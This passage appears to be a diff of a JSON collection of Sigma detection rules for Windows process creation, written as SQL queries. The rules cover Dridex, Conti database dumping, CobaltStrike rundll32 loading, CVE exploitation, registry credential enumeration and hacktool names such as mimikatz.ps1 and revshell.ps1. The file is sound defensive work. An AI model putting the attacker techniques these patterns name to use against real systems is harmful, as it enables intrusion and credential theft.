ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmi_persistence_script_event_consumer.yml" + "filename": "proc_creation_win_sc_service_path_modification.yml" }, { - "title": "Use of Mftrace.exe", - "id": "3d48c9d3-1aa6-418d-98d3-8fd3c01a564e", + "title": "Stop Windows Service Via Sc.EXE", 
+ "id": "81bcb81b-5b1f-474b-b373-52c871aaa7b1", "status": "experimental", - "description": "The \"Trace log generation tool for Media Foundation Tools\" (Mftrace.exe) can be used to execute arbitrary binaries", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the stopping of a Windows service", + "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1127" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "Legitimate use for tracing purposes" + "There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR OriginalFileName = 'mftrace.exe') AND (CommandLine LIKE '%.exe %' ESCAPE '\\' AND CommandLine LIKE '%.exe' ESCAPE '\\')) OR ParentImage LIKE '%\\\\mftrace.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((OriginalFileName = 'sc.exe' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\') AND CommandLine LIKE '% stop %' ESCAPE '\\') AND NOT ((CommandLine IN ('sc stop KSCWebConsoleMessageQueue', 'sc stop LGHUBUpdaterService') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_mftrace.yml" + "filename": "proc_creation_win_sc_stop_service.yml" }, { - "title": "Exploiting CVE-2019-1388", - "id": "02e0b2ea-a597-428e-b04a-af6a1a403e5c", - "status": "stable", - "description": "Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Defense Evasion Via Rename Of Highly 
Relevant Binaries", + "id": "0ba1da6d-b6ce-4366-828c-18826c9de23e", + "status": "test", + "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", + "author": "Matthew Green - @mgreen27, Florian Roth (Nextron Systems), frack113", "tags": [ - "attack.privilege_escalation", - "attack.t1068" + "attack.defense_evasion", + "attack.t1036.003", + "car.2013-05-009" ], "falsepositives": [ - "Unknown" + "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist", + "PsExec installed via Windows Store doesn't contain original filename field (False negative)" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\consent.exe' ESCAPE '\\' AND Image LIKE '%\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\') AND (IntegrityLevel = 'System' OR (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'Execute processes remotely' OR Product = 'Sysinternals PsExec' OR (Description LIKE 'Windows PowerShell%' ESCAPE '\\' OR Description LIKE 'pwsh%' ESCAPE '\\') OR (OriginalFileName LIKE 'powershell.exe' ESCAPE '\\' OR OriginalFileName LIKE 'pwsh.dll' ESCAPE '\\' OR OriginalFileName LIKE 'powershell\\_ise.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.c' ESCAPE '\\' OR OriginalFileName LIKE 'psexesvc.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'mshta.exe' ESCAPE '\\' OR OriginalFileName LIKE 'regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wmic.exe' ESCAPE '\\' OR OriginalFileName LIKE 
'certutil.exe' ESCAPE '\\' OR OriginalFileName LIKE 'rundll32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cmstp.exe' ESCAPE '\\' OR OriginalFileName LIKE 'msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'reg.exe' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\psexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\psexec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PSEXESVC.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2019_1388.yml" + "filename": "proc_creation_win_renamed_binary_highly_relevant.yml" }, { - "title": "Suspicious Outlook Child Process", - "id": "208748f7-881d-47ac-a29c-07ea84bf691d", - "status": "test", - "description": "Detects a suspicious process spawning from an Outlook process.", - "author": "Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team", + "title": "Use of W32tm as Timer", + "id": "6da2c9f5-7c53-401b-aacb-92c040ce1215", + "status": "experimental", + "description": "When configured with suitable command line arguments, w32tm can act as a delay mechanism", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.discovery", + "attack.t1124" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND (Image LIKE '%\\\\AppVLP.exe' 
ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR OriginalFileName = 'w32time.dll') AND (CommandLine LIKE '%/stripchart%' ESCAPE '\\' AND CommandLine LIKE '%/computer:%' ESCAPE '\\' AND CommandLine LIKE '%/period:%' ESCAPE '\\' AND CommandLine LIKE '%/dataonly%' ESCAPE '\\' AND CommandLine LIKE '%/samples:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_office_outlook_susp_child_processes.yml" + "filename": "proc_creation_win_w32tm.yml" }, { - "title": "Parent in Public Folder Suspicious Process", - "id": "69bd9b97-2be2-41b6-9816-fb08757a4d1a", - "status": "experimental", - "description": "This rule detects suspicious processes with parent images located in the C:\\Users\\Public folder", + "title": "Suspicious LOLBIN AccCheckConsole", + "id": "0f6da907-5854-4be6-859a-e9958747b0aa", + "status": "test", + "description": "Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an arbitrary DLL", "author": "Florian Roth (Nextron Systems)", + "tags": [ + 
"attack.execution" + ], "falsepositives": [ - "Unknown" + "Legitimate use of the UI Accessibility Checker" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%wscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%cscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%mshta.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\AccCheckConsole.exe' ESCAPE '\\' OR OriginalFileName = 'AccCheckConsole.exe') AND (CommandLine LIKE '% -window %' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_execution_from_public_folder_as_parent.yml" + "filename": "proc_creation_win_lolbin_susp_acccheckconsole.yml" }, { - "title": "Potential Suspicious Registry File Imported Via Reg.EXE", - "id": "62e0298b-e994-4189-bc87-bc699aa62d97", + "title": "Winrar Compressing Dump Files", + "id": "1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc", "status": "experimental", - "description": "Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility", - "author": "frack113, Nasreddine Bencherchali", + "description": "Detects a suspicious winrar execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1112", - "attack.defense_evasion" + "attack.collection", + 
"attack.t1560.001" ], "falsepositives": [ - "Legitimate import of keys" + "Legitimate use of WinRAR with a command line in which .dmp appears accidentally" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '% import %' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rar.exe' ESCAPE '\\' OR Image LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_import_from_suspicious_paths.yml" + "filename": "proc_creation_win_winrar_dmp.yml" }, { - "title": "Potential Dridex Activity", - "id": "e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e", - "status": "stable", - "description": "Detects potential Dridex acitvity via specific process patterns", - "author": "Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055", - "attack.discovery", - "attack.t1135", - "attack.t1033" - ], + "title": "Suspicious IIS Module Registration", + "id": "043c4b8b-3a54-4780-9682-081cb6b8185c", + "status": "test", + "description": "Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors", + "author": "Florian Roth (Nextron Systems), 
Microsoft (idea)", "falsepositives": [ - "Unlikely" + "Administrative activity" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') AND NOT (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\excel.exe' ESCAPE '\\' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '% -s %' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.dll%' ESCAPE '\\'))) OR (ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\whoami.exe' ESCAPE '\\' AND CommandLine LIKE '% /all%' ESCAPE '\\') OR ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% view%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND (CommandLine LIKE '%appcmd.exe add module%' ESCAPE '\\' OR (CommandLine LIKE '% system.enterpriseservices.internal.publish%' ESCAPE '\\' AND Image LIKE '%\\\\powershell.exe' ESCAPE '\\') OR (CommandLine LIKE '%gacutil%' ESCAPE '\\' AND CommandLine LIKE '% /I%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_dridex.yml" + "filename": "proc_creation_win_iis_susp_module_registration.yml" }, { - "title": "Potential Password Spraying Attempt Using Dsacls.EXE", - "id": "bac9fb54-2da7-44e9-988f-11e9a5edbc0c", + "title": "Conhost.exe CommandLine Path Traversal", + "id": "ee5e119b-1f75-4b34-add8-3be976961e39", "status": "experimental", - "description": "Detects possible password spraying attempts using Dsacls", + "description": "detects the usage of path traversal in conhost.exe indicating possible command/argument 
confusion/hijacking", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1218" + "attack.t1059.003" ], "falsepositives": [ - "Legitimate use of dsacls to bind to an LDAP session" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dsacls.exe' ESCAPE '\\' OR OriginalFileName = 'DSACLS.EXE') AND (CommandLine LIKE '%/user:%' ESCAPE '\\' AND CommandLine LIKE '%/passwd:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentCommandLine LIKE '%conhost%' ESCAPE '\\' AND CommandLine LIKE '%/../../%' ESCAPE '\\')" ], - "filename": "proc_creation_win_dsacls_password_spray.yml" + "filename": "proc_creation_win_conhost_path_traversal.yml" }, { - "title": "Explorer Process Tree Break", - "id": "949f1ffb-6e85-4f00-ae1e-c3c5b190d605", - "status": "test", - "description": "Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries,\nwhich is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from \"svchost\"\n", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @gott_cyber", + "title": "Arbitrary Shell Command Execution Via Settingcontent-Ms", + "id": "24de4f3b-804c-4165-b442-5a06a2302c7e", + "status": "experimental", + "description": "The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create \"shortcuts\" to various Windows 10 setting pages. 
These files are simply XML and contain paths to various Windows 10 settings binaries.", + "author": "Sreeman", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.t1204", + "attack.t1566.001", + "attack.execution", + "attack.initial_access" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b}%' ESCAPE '\\' OR (CommandLine LIKE '%explorer.exe%' ESCAPE '\\' AND CommandLine LIKE '% /root,%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%.SettingContent-ms%' ESCAPE '\\' AND NOT (CommandLine LIKE '%immersivecontrolpanel%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_explorer_break_process_tree.yml" + "filename": "proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent.yml" }, { - "title": "Suspicious Program Names", - "id": "efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6", + "title": "HH.EXE Execution", + "id": "68c8acb4-1b60-4890-8e82-3ddf7a6dba84", "status": "test", - "description": "Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the usage of \"hh.exe\" to execute \".chm\" files.", + "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Dan Beavin), oscd.community", + "tags": [ + "attack.defense_evasion", + "attack.t1218.001" + ], "falsepositives": [ - "Legitimate tools that accidentally match on the searched patterns" + "False positives are expected with legitimate \".CHM\"" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\CVE-202%' ESCAPE '\\' OR Image LIKE '%\\\\CVE202%' ESCAPE '\\') OR (Image LIKE '%\\\\poc.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact64.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact\\_protected.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact32.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact32big.exe' ESCAPE '\\' OR Image LIKE '%obfuscated.exe' ESCAPE '\\' OR Image LIKE '%obfusc.exe' ESCAPE '\\' OR Image LIKE '%\\\\meterpreter' ESCAPE '\\') OR (CommandLine LIKE '%inject.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CVE%' ESCAPE '\\' OR CommandLine LIKE '%pupy.ps1%' ESCAPE '\\' OR CommandLine LIKE '%payload.ps1%' ESCAPE '\\' OR CommandLine LIKE '%beacon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%PowerView.ps1%' ESCAPE '\\' OR CommandLine LIKE '%bypass.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfuscated.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfusc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfus.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfs.ps1%' ESCAPE '\\' OR CommandLine LIKE '%evil.ps1%' ESCAPE '\\' OR CommandLine LIKE '%MiniDogz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\_enc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\shell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\rshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%revshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av\\_test.ps1%' ESCAPE '\\' OR CommandLine LIKE '%adrecon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz.ps1%' ESCAPE '\\' OR CommandLine LIKE 
'%\\\\PowerUp\\_%' ESCAPE '\\' OR CommandLine LIKE '%powerup.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\a.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\p.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\1.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Hound.ps1%' ESCAPE '\\' OR CommandLine LIKE '%encode.ps1%' ESCAPE '\\' OR CommandLine LIKE '%powercat.ps1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'HH.exe' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND CommandLine LIKE '%.chm%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_progname.yml" + "filename": "proc_creation_win_hh_chm_execution.yml" }, { - "title": "Potential Conti Ransomware Database Dumping Activity", - "id": "2f47f1fd-0901-466e-a770-3b7092834a1b", + "title": "CobaltStrike Load by Rundll32", + "id": "ae9c6a7c-9521-42a6-915e-5aaa8689d529", "status": "test", - "description": "Detects a command used by conti to dump database", - "author": "frack113", + "description": "Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.", + "author": "Wojciech Lesicki", "tags": [ - "attack.collection", - "attack.t1005" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' OR (CommandLine LIKE '%sqlcmd %' ESCAPE '\\' OR CommandLine LIKE '%sqlcmd.exe%' ESCAPE '\\')) AND CommandLine LIKE '% -S localhost %' ESCAPE '\\' AND (CommandLine LIKE '%sys.sysprocesses%' ESCAPE '\\' OR CommandLine LIKE '%master.dbo.sysdatabases%' ESCAPE '\\' OR CommandLine LIKE '%BACKUP DATABASE%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR 
(CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' OR CommandLine LIKE '%rundll32 %' ESCAPE '\\')) AND (CommandLine LIKE '%.dll%' ESCAPE '\\' AND (CommandLine LIKE '% StartW' ESCAPE '\\' OR CommandLine LIKE '%,StartW' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_conti_ransomware_database_dump.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml" }, { - "title": "PUA - NSudo Execution", - "id": "771d1eb5-9587-4568-95fb-9ec44153a012", - "status": "experimental", - "description": "Detects the use of NSudo tool for command execution", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "title": "DNS RCE CVE-2020-1350", + "id": "b5281f31-f9cc-4d0d-95d0-45b91c45b487", + "status": "test", + "description": "Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.initial_access", + "attack.t1190", "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.t1569.002" ], "falsepositives": [ - "Legitimate use by administrators" + "Unknown but benign sub processes of the Windows DNS service dns.exe" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\NSudo.exe' ESCAPE '\\' OR Image LIKE '%\\\\NSudoLC.exe' ESCAPE '\\' OR Image LIKE '%\\\\NSudoLG.exe' ESCAPE '\\') OR OriginalFileName IN ('NSudo.exe', 'NSudoLC.exe', 'NSudoLG.exe')) AND (CommandLine LIKE '%-U:S %' ESCAPE '\\' OR CommandLine LIKE '%-U:T %' ESCAPE '\\' OR CommandLine LIKE '%-U:E %' ESCAPE '\\' OR CommandLine LIKE '%-P:E %' ESCAPE '\\' OR CommandLine LIKE '%-M:S %' ESCAPE '\\' OR CommandLine LIKE '%-M:H %' ESCAPE '\\' OR CommandLine LIKE '%-U=S %' ESCAPE '\\' OR CommandLine LIKE '%-U=T %' ESCAPE '\\' OR CommandLine LIKE '%-U=E %' ESCAPE '\\' OR CommandLine LIKE '%-P=E %' ESCAPE '\\' OR CommandLine LIKE '%-M=S %' 
ESCAPE '\\' OR CommandLine LIKE '%-M=H %' ESCAPE '\\' OR CommandLine LIKE '%-ShowWindowMode:Hide%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\System32\\\\werfault.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\dnscmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_nsudo.yml" + "filename": "proc_creation_win_exploit_cve_2020_1350.yml" }, { - "title": "DLL Sideloading by Microsoft Defender", - "id": "7002aa10-b8d4-47ae-b5ba-51ab07e228b9", - "status": "experimental", - "description": "Detects execution of Microsoft Defender's CLI process (MpCmdRun.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", - "author": "Bhabesh Raj", + "title": "Enumeration for Credentials in Registry", + "id": "e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1", + "status": "test", + "description": "Adversaries may search the Registry on compromised systems for insecurely stored credentials.\nThe Windows Registry stores configuration information that can be used by the system or other programs.\nAdversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.credential_access", + "attack.t1552.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR Image LIKE 
'C:\\\\Windows\\\\winsxs\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MpCmdRun.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '% query %' ESCAPE '\\' AND CommandLine LIKE '%/t %' ESCAPE '\\' AND CommandLine LIKE '%REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/s%' ESCAPE '\\') AND ((CommandLine LIKE '%/f %' ESCAPE '\\' AND CommandLine LIKE '%HKLM%' ESCAPE '\\') OR (CommandLine LIKE '%/f %' ESCAPE '\\' AND CommandLine LIKE '%HKCU%' ESCAPE '\\') OR CommandLine LIKE '%HKCU\\\\Software\\\\SimonTatham\\\\PuTTY\\\\Sessions%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mpcmdrun_dll_sideload_defender.yml" + "filename": "proc_creation_win_reg_enumeration_for_credentials_in_registry.yml" }, { - "title": "Suspicious Electron Application Child Processes", - "id": 